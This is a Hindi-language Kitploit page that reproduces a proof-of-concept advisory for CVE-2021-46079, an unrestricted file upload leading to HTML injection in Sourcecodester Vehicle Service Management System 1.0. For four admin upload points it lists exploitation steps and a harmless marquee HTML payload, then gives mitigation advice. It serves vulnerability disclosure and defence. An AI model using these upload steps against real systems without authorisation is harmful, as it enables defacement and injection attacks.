Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection — CVE-2021-46079 - Sourcecodester Vehicle Service Management System 1.0 में एक असीमित फ़ाइल अपलोड कमज़ोरी मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है जिससे Html Injection हो सकता है। | Kitploit
उपकरण/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection

CVE-2021-46079 - Sourcecodester Vehicle Service Management System 1.0 में एक असीमित फ़ाइल अपलोड कमज़ोरी मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है जिससे Html Injection हो सकता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

CVE-2021-46079

शोषण शीर्षक: Vehicle Service Management System - 'Multiple' फ़ाइल अपलोड से Html इंजेक्शन

शोषण लेखक: SANU P.L

CVE: CVE-2021-46079

CVSS: 7.2 HIGH

संदर्भ:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46079
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079

विवरण:

Sourcecodester Vehicle Service Management System 1.0 में एक अप्रतिबंधित फ़ाइल अपलोड कमजोरी मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है, जिससे Html इंजेक्शन हो सकता है।

1. Vehicle Service Management System - 'मेरा खाता' (/admin/?page=user)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. मेरा खाता अनुभाग पर जाएं http://localhost/vehicle_service/admin/?page=user

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. उपरोक्त html कोड को सहेजें, उदाहरण: Html Injection.html
  2. मेरा खाता अनुभाग में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. अवतार छवि को एक नए टैब में खोलें।
  5. Html इंजेक्शन निष्पादित होता है।

2. Vehicle Service Management System - 'उपयोगकर्ता सूची' (/admin/?page=user/manage_user)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. उपयोगकर्ता सूची अनुभाग पर जाएं और Create New बटन पर क्लिक करें।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. उपरोक्त html कोड को सहेजें, उदाहरण: Html Injection.html
  2. नया उपयोगकर्ता पृष्ठ पर सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल ब्राउज़ करें।
  3. सेव बटन पर क्लिक करें।
  4. अवतार छवि को एक नए टैब में खोलें।
  5. Html इंजेक्शन निष्पादित होता है।

3. Vehicle Service Management System - 'सेटिंग्स-सिस्टम लोगो' (/admin/?page=system_info)

पेलोड:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. सेटिंग्स अनुभाग पर जाएं http://localhost/vehicle_service/admin/?page=system_info

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. उपरोक्त html कोड को सहेजें, उदाहरण: Html Injection.html
  2. सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और System Logo में html फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. System Logo छवि को एक नए टैब में खोलें।
  5. Html इंजेक्शन निष्पादित होता है।

4. Vehicle Service Management System - 'सेटिंग्स-वेबसाइट कवर' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. सेटिंग्स अनुभाग पर जाएं http://localhost/vehicle_service/admin/?page=system_info

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. उपरोक्त html कोड को सहेजें, उदाहरण: Html Injection.html
  2. सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और Website Cover में html फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. Website Cover छवि को एक नए टैब में खोलें।
  5. Html इंजेक्शन निष्पादित होता है।

प्रभाव:

एक हमलावर कई एंडपॉइंट्स पर दुर्भावनापूर्ण फ़ाइल अपलोड कर सकता है, जिससे Html इंजेक्शन होता है।

शमन:

निम्नलिखित को लागू करने की अनुशंसा की जाती है:

  • फ़ाइल नाम और उसके एक्सटेंशन को बिना व्हाइट-लिस्ट फ़िल्टर के सीधे स्वीकार न करें।
  • यदि यूनिकोड वर्णों की आवश्यकता नहीं है, तो फ़ाइल नाम और एक्सटेंशन के लिए केवल अल्फा-न्यूमेरिक वर्ण और केवल एक डॉट स्वीकार करने की अत्यधिक अनुशंसा की जाती है।
  • सेवा अस्वीकार हमलों को रोकने के लिए फ़ाइल आकार को अधिकतम मान तक सीमित करें।
  • अपलोड की गई निर्देशिका में कोई "निष्पादित" अनुमति नहीं होनी चाहिए।
  • केवल क्लाइंट-साइड सत्यापन पर निर्भर न रहें।
टूल डाउनलोड करें